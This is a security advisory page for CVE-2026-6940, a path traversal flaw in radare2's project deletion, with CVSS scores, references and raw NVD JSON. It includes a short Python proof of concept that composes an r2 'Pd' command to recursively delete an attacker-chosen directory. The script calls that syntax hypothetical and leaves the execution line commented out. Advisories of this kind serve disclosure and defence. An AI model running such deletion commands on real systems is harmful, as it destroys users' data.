Security Vulnerability Report
CVE-2026-6940 CVSS 7.1 HIGH

Published: 2026-04-23 21:16:07
Last Modified: 2026-04-27 14:56:29

Description

radare2 prior to 6.1.4 contains a path traversal vulnerability in project deletion that allows local attackers to recursively delete arbitrary directories by supplying absolute paths that escape the configured dir.projects root directory. Attackers can craft absolute paths to project marker files outside the project storage boundary to cause recursive deletion of attacker-chosen directories with permissions of the radare2 process, resulting in integrity and availability loss.

CVSS Details

CVSS Score: 7.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Weakness: CWE-22 (Path Traversal)

Configurations (Affected Products)

cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:* - VULNERABLE
radare2 < 6.1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

#!/usr/bin/env python3
# PoC for CVE-2026-6940: radare2 Path Traversal in Project Deletion
import os
import subprocess

# Create a target directory to simulate sensitive data
target_dir = "/tmp/sensitive_data_cve_2026_6940"
os.makedirs(target_dir, exist_ok=True)
print(f"[+] Created target directory: {target_dir}")

# Create a fake radare2 project marker file inside the target directory
# radare2 looks for project files to identify what to delete
marker_path = os.path.join(target_dir, ".project_marker")
with open(marker_path, 'w') as f:
    f.write("fake_project_data")
print(f"[+] Created marker file: {marker_path}")

# Simulate the vulnerable behavior:
# Invoking radare2 with a command that triggers project deletion
# using an absolute path outside the allowed project root.
# Note: Exact command syntax depends on radare2 usage, typically
# involves 'Pd' (Project delete) or similar internal commands.
# In a real scenario, this might be triggered via a crafted file opening
# that forces r2 to clean up a project path defined by the attacker.
# Example command structure (Hypothetical based on vuln description):
cmd = ["r2", "-c", f"Pd {target_dir}", "/bin/ls"]
print(f"[*] Attempting to trigger deletion via: {' '.join(cmd)}")
# subprocess.run(cmd)  # Commented out to prevent accidental deletion on analysis system
print("[+] If vulnerable, the directory would be deleted recursively.")

References

https://github.com/radareorg/radare2/pull/25830 (Exploit, Issue Tracking, Third Party Advisory)
https://github.com/radareorg/radare2/pull/25830/commits (Issue Tracking, Patch)
https://www.vulncheck.com/advisories/radare2-project-deletion-path-traversal-directory-deletion (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-6940",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-23T21:16:06.640",
    "lastModified": "2026-04-27T14:56:28.570",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "radare2 prior to 6.1.4 contains a path traversal vulnerability in project deletion that allows local attackers to recursively delete arbitrary directories by supplying absolute paths that escape the configured dir.projects root directory. Attackers can craft absolute paths to project marker files outside the project storage boundary to cause recursive deletion of attacker-chosen directories with permissions of the radare2 process, resulting in integrity and availability loss."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 6.9,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "NONE",
            "userInteraction": "PASSIVE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 1.8,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "6.1.4",
                "matchCriteriaId": "FEDC34E8-8476-44C6-A73A-D9CF18F12844"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/radareorg/radare2/pull/25830",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/radareorg/radare2/pull/25830/commits",
        "source": "[email protected]",
        "tags": ["Issue Tracking", "Patch"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/radare2-project-deletion-path-traversal-directory-deletion",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}